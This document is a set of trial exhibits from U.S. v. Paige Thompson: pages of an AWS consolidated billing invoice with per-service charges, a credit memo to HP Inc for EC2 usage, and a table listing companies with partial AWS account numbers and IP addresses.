AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:          0227
ABA Routing Number:          0248
Wire Routing Number:          0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

921–004

| | |
|---|---|
| Charges | $0.91 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Cognito** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon EC2 Container Registry (ECR)** | **$325.81** |
| Charges | $325.81 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Cloud Map** | **$0.18** |
| Charges | $0.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Glue** | **$109.19** |
| Charges | $109.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Budgets** | **$4.76** |
| Charges | $4.76 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

\* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
\*\* This is not a VAT or GST invoice
\*\*\*\* Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:      0227
ABA Routing Number:      0248
Wire Routing Number:      0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

5

921-005

| Amazon API Gateway | $283.71 |
|---|---|
| Charges | $283.71 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| CloudWatch Events | $0.01 |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Route 53 | $484.51 |
| Charges | $480.23 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $4.28 |
| CT | $0.00 |
| Amazon Kinesis Analytics | $97.24 |
| Charges | $97.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $1,915.64 |
| Charges | $1,915.64 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Greengrass | $0.16 |
| Charges | $0.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:        0248
Wire Routing Number:        0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

6

| | |
|---|---|
| CT | $0.00 |
| **AWS CloudTrail** | **$2,093.18** |
| Charges | $2,093.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon WorkSpaces** | **$2,567.71** |
| Charges | $2,567.71 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon WorkDocs** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AmazonWorkMail** | **$12.00** |
| Charges | $12.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Queue Service** | **$829.63** |
| Charges | $829.63 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Kinesis** | **$2,140.77** |
| Charges | $2,140.77 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: _____0227
ABA Routing Number: _____0248
Wire Routing Number: _____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---:|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Lambda** | **$1,891.66** |
| Charges | $1,891.65 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.01 |
| CT | $0.00 |
| **Amazon Simple Storage Service** | **$56,626.45** |
| Charges | $56,623.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $3.35 |
| CT | $0.00 |
| **Amazon Glacier** | **$155.72** |
| Charges | $155.72 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Sumerian** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$77,396.04** |
| Charges | $77,341.93 |
| Credits | ($5.51) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $59.62 |
| CT | $0.00 |
| **AWS Security Hub** | **$0.00** |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: ____0227
ABA Routing Number: ____0248
Wire Routing Number: ____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

8

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Systems Manager** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Lightsail** | **$16.65** |
| Charges | $15.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.85 |
| CT | $0.00 |
| **Amazon Elastic Compute Cloud** | **$286,989.03** |
| Charges | $286,816.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $172.23 |
| CT | $0.00 |
| **Amazon Connect** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Device Farm** | **$500.00** |
| Charges | $500.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Notification Service** | **$356.11** |

\* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
\*\* This is not a VAT or GST invoice
\*\*\*\* Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: ____0227
ABA Routing Number: ____0248
Wire Routing Number: ____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

9

921–009

| | |
|---|---|
| Charges | $356.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.01 |
| CT | $0.00 |
| **AWS Config** | **$4,897.44** |
| Charges | $4,896.29 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $1.15 |
| CT | $0.00 |
| **Amazon Elastic File System** | **$811.75** |
| Charges | $811.75 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Contact Center Telecommunications (service sold by AMCS, LLC)** | **$3.59** |
| Charges | $2.98 |
| Government Fees and Taxes, Other Fees and Monthly Charges (Telecommunications) | $0.61 |
| **AWS Data Pipeline** | **$432.85** |
| Charges | $432.81 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.04 |
| CT | $0.00 |
| **Amazon ElastiCache** | **$20,820.21** |
| Charges | $20,779.62 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $40.59 |
| CT | $0.00 |
| **Amazon CloudFront** | **$4,286.19** |
| Charges | $4,276.68 |
| VAT ** | $0.00 |

\* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
\*\* This is not a VAT or GST invoice
\*\*\*\* Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:        0248
Wire Routing Number:        0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

10

921-010

| | |
|---|---|
| GST | $0.00 |
| Estimated US sales tax to be collected | $9.51 |
| CT | $0.00 |
| **Amazon Virtual Private Cloud** | **$1,023.07** |
| Charges | $1,023.07 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Data Transfer** | **$46,157.20** |
| Charges | $46,156.99 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.21 |
| CT | $0.00 |
| **Amazon Machine Learning** | **$1.77** |
| Charges | $1.77 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Email Service** | **$67.35** |
| Charges | $67.35 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Step Functions** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic MapReduce** | **$1,079.10** |
| Charges | $1,079.10 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:
ABA Routing Number:
Wire Routing Number:
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

921–011

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DynamoDB** | **$10,415.46** |
| Charges | $10,415.12 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.34 |
| CT | $0.00 |
| **Amazon MQ** | **$1,166.97** |
| Charges | $1,166.97 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Polly** | **$0.01** |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Registrar** | **$46.00** |
| Charges | $46.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS AppSync** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS CloudHSM** | **$2,716.54** |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:      0227
ABA Routing Number:      0248
Wire Routing Number:      0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124–8423, US

921–012

| | |
|---|---|
| Charges | $2,716.54 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS IoT Device Management** | **$0.24** |
| Charges | $0.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS WAF** | **$806.79** |
| Charges | $806.79 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elasticsearch Service** | **$6,051.87** |
| Charges | $6,051.87 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Rekognition** | **$0.42** |
| Charges | $0.42 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DocumentDB (with MongoDB compatibility)** | **$463.60** |
| Charges | $463.60 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:      0227
ABA Routing Number:      0248
Wire Routing Number:      0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

13

921-013

| AWS Key Management Service | $268.50 |
|---|---|
| Charges | $267.74 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.76 |
| CT | $0.00 |
| **Amazon Kinesis Firehose** | **$1,532.41** |
| Charges | $1,532.41 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: [ ] 0227
ABA Routing Number: [ ] 0248
Wire Routing Number: [ ] 0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

14

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
| --- | --- |
| Bank Name: Wells Fargo NA | Amazon Web Services, Inc. |
| Account Name: Amazon Web Services, Inc. | PO BOX 84023 |
| Bank Address: | Seattle, WA 98124-8423, US |
| 420 Montgomery Street | |
| San Francisco CA 94163 | |
| Checking Account Number:        0227 | |
| ABA Routing Number:        0248 | |
| Wire Routing Number:        0248 | |
| SWIFT Code: WFBIUS6SXXX | |

All web services are sold by Amazon Web Services, Inc.

The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

921-015

Payer account number
██████████6068



# LINKED ACCOUNT ALLOCATION

Linked account detail is not included in this invoice due to the large number of accounts. To view linked account detail please visit the Account Activity Page, aws.amazon.com/

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

16

# EXHIBIT 922



Account number: 6068

## Amazon Web Services, Inc. Credit Memo
Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

| | |
|---|---|
| Invoice Number: | 2597 |
| Invoice Date: | June 27 , 2019 |
| Original Invoice Number: | 4725 |
| PO Number: | HPI3102351 |
| **TOTAL AMOUNT** | **($9,240.00)** |

Bill to Address:
HP Inc
ATTN: Benita Fairbairn
HP Inc, Call Box 42000
Aguadilla , PR , 00605 , PR

This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| | |
|---|---|
| **AWS Service Charges** | **($9,240.00)** |
| Charges | ($9,240.00) |
| Tax * | $0.00 |
| **Total for this invoice** | **($9,240.00)** |

### Detail for Consolidated Bill

| | |
|---|---|
| **Amazon Elastic Compute Cloud** | **($9,240.00)** |
| Charges | ($9,240.00) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Start Date - 04/01/2019; End Date - 04/26/2019** | **($9,215.11)** |
| **Start Date - 04/01/2019; End Date - 04/30/2019** | **($24.89)** |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 922
Admitted_____

Payer account number

░░░░░░░6068



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
| --- | --- |
| hpbridge-prod ░░░░░░░9728) | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | ($9,240.00) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

2

922-002

Payer account number
6068



| Summary for Linked Account | |
|---|---|
| hpbridge-prod 9728) | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Account 9728 total allocated for this invoice | ($9,240.00) |

| Detail for Linked Account | |
|---|---|
| Amazon Elastic Compute Cloud | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 04/01/2019; End Date - 04/26/2019 | ($9,215.11) |
| Start Date - 04/01/2019; End Date - 04/30/2019 | ($24.89) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

3

922-003

# EXHIBIT 956

| Company | Amazon Account No. | IP Address | IAM Role |
|---|---|---|---|
| Capital One | 9784 | 34.234.188.25 | |
| Apperian (Digital.Ai) | 3769 | 54.77.46.101<br>54.198.107.105 | |
| 42 Lines | 6483 | 18.235.8.209 | |
| Survox (Enghouse) | 0924 | 35.161.43.11 | |
| Waitrainer | 3625 | 13.52.44.117 | |
| A T Works | 4197 | 13.113.12.133 | |
| Powersquare India | 7507 | 18.208.62.195 | |
| Hewlett-Packard Inc. | 9728 | 54.193.62.96 | |
| Vodafone | 1427 | 63.34.213.125 | |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 956
Admitted_____